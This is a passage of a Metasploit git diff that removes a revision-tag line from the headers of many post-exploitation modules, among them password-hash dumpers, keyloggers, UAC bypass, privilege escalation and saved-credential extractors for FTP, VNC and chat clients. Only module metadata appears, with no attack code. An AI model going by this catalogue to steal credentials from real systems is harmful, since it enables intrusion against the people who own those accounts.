=> ['shell', 'meterpreter' ] )) diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 0319bedcfa..eac46c3698 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Performs IPv4 ping sweep using the OS included ping command.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win','linux', 'osx', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index f3bb9d2179..ee5a21c389 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post execute the commands in the specified Meterpreter session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index 69fac10f7f..eaad0884e7 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win', 'osx' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index 8b76fb58f6..60638eece6 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Jim Halfpenny'], - 'Version' => "$Revision$", 'Platform' => ['linux', 'bsd', 'unix', 'osx'], 'SessionTypes' => ['meterpreter', 'shell' ] )) diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 21ac80101e..6a1b846e69 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module closes the specified session. This can be useful as a finisher for automation tasks }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux', 'win', 'unix', 'osx' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 4d53afa4a1..6bf116701f 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module executes an arbitrary command line}, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'Platform' => [ 'linux', 'win', 'unix', 'osx' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index 4190cdced1..a5324c8f53 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ ''], - 'Version' => '$Revision$', 'Platform' => [ 'win', 'unix', 'osx', 'linux', 'solaris' ], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index 69c94d3d85..e2e1273030 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'todb '], - 'Version' => '$Revision$', 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 152517bed1..1724d1fa7f 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'unix', 'osx', 'linux'], 'SessionTypes' => [ 'meterpreter','shell' ] )) diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index 7455b3dd7b..9e7e897d29 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'osx' ], 'SessionTypes' => [ "shell" ] )) diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index d1f410ee59..bef4feac4c 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ','hammackj '], - 'Version' => '$Revision$', 'Platform' => [ 'osx' ], 'SessionTypes' => [ "shell" ] )) diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index d4bfb904f1..68f63f4741 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post and QEMU/KVM.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index a5690fbcd7..529f028ebb 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to enumerate installed packages on a Solaris System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index 44c866a3f4..d3bc5b41b2 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to enumerate services on a Solaris System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index ca410590a3..82be01d6ac 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ Post Module to dump the password hashes for all users on a Solaris System}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'solaris' ], 'SessionTypes' => [ 'shell' ] )) diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index b9b44b5358..b1f1b0857b 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', ] diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index 094e3c0db8..ba091e24df 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post false sense of security to the user.}, 'License' => MSF_LICENSE, 'Author' => [ 'mubix', 'cg' ], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'References' => [['URL', 'http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html']] diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index b785b445e1..364b771a34 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'David Kennedy "ReL1K" ', 'mitnick' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index 11743256cb..3895b486b7 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => 'hdm', - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index d4af0d9549..7a412a7208 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post 'Ruben Santamarta', # First public exploit 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/ms10_092_schelevator.rb b/modules/post/windows/escalate/ms10_092_schelevator.rb index 535c0827b9..e14fe3dfa6 100644 --- a/modules/post/windows/escalate/ms10_092_schelevator.rb +++ b/modules/post/windows/escalate/ms10_092_schelevator.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index 2e2845d3fd..1c54990055 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'bannedit' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index 450c721235..e991f2ea4f 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post 'L4teral ', # Meterpreter script 'Metlstorm' # Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16 ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index b460c9eba3..b4dd4acf8f 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'scriptjunkie' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index dd1b10f264..58279920e6 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post Meterpreter Session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index 31192c248a..17fa022f55 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'illwill '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index df7d5a11b5..dddf43ab7e 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post 'Maurizio Agazzini ', 'mubix' ], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'References' => [['URL', 'http://lab.mediaservice.net/code/cachedump.rb']] diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index 34ff075d6e..ab3d649e36 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index 88714a9530..6797429c39 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module harvests credentials found on the host and stores them in the database.}, 'License' => MSF_LICENSE, 'Author' => [ 'tebo[at]attackresearch.com'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index 0eb76ab4c5..c1af2d3684 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post 'Shubham Dawra ', #SecurityXploded.com 'sinn3r', #Lots of code rewrite ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 1573b934d3..338864138b 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post display the username and location. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499'] diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index b46504c218..ff188cd141 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Post 'SecurityXploded Team', #www.SecurityXploded.com 'Sil3ntDre4m ', ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 369dba5c8a..e192bac621 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Nathan Einwechter '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 9837b887d3..e3abcaeccf 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will collect credentials from the FileZilla FTP server if installed. }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index aaadfe692e..452f3771ce 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post finds saved FTP connections in the Sites.dat file. }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index e2d7c085d3..3f8927b1a8 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => "$Revision$", 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index 3d7bfbaf57..6398bf3420 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post 'sil3ntdre4m ', 'SecurityXploded Team ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index 0f3f700ce5..ec3b6b1aa2 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post particular category. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', #Metasploit diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 21067309a1..745e30410b 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Post 'Shubham Dawra ' # www.SecurityXploded.com ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 650d369983..bb5818b6b9 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post 'Sil3ntDre4m ', 'SecurityXploded Team ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index d94e26d0c4..fbb7b19e8d 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Post 'hdm', #Helped write the Decryption Routine 'mubix' #Helped write the Decryption Routine ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index 7a1763a888..d2b084ee16 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post 'sil3ntdre4m ', 'SecurityXploded Team', #www.SecurityXploded.com ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index e1d0d29675..f9bf10b3e3 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Cacak'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 7737469e2b..238ba962ed 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather SmartFTP Saved Password Extraction', - 'Version' => '$Revision$', 'Description' => %q{ This module finds saved login credentials for the SmartFTP FTP client for windows. It finds the saved passwords and decrypts diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 8de1442997..6620923307 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index 9f633ae88a..4a411168bd 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Post 'Sil3ntDre4m ', 'SecurityXploded Team', #www.SecurityXploded.com ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index fedc38ccf3..2cacaa380a 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Post 'Kurt Grutzmacher ', 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index dea4dc8b45..0cc826870d 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post [ 'Myo Soe ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index ed0efc6da1..d63bb4f8b0 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, 'Name' => 'Windows Gather WinSCP Saved Password Extraction', - 'Version' => '$Revision$', 'Description' => %q{ This module extracts weakly encrypted saved passwords from WinSCP. It searches for saved sessions in the Windows Registry diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index e7609e1379..6a1c5853bd 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index c63de3abbf..9de09578c2 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post names, volume serial numbers, and more. }, 'License' => MSF_LICENSE, 'Author' => [ 'davehull '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index 1dbff027a3..c78ecd18c9 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate all installed applications }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 42b45c12ac..69866a3f4e 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post sensitive information. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 1cac932524..eac863262e 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Post background job. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Brandon Perry ' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index c523b6d618..bdbad7e5dd 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post %PATH% variable. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index c3254064ee..0f73c4fb6f 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Joshua Abraham '] diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index 119fd7c28a..df6fe7333d 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Post 'Carlos Perez ', 'Stephen Haywood ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index c8f734a23b..d09a240ae6 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win'], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index fc33fd2a67..8383c3df61 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] )) diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index 10b48534df..f79a4fa054 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate current and recently logged on Windows users}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => 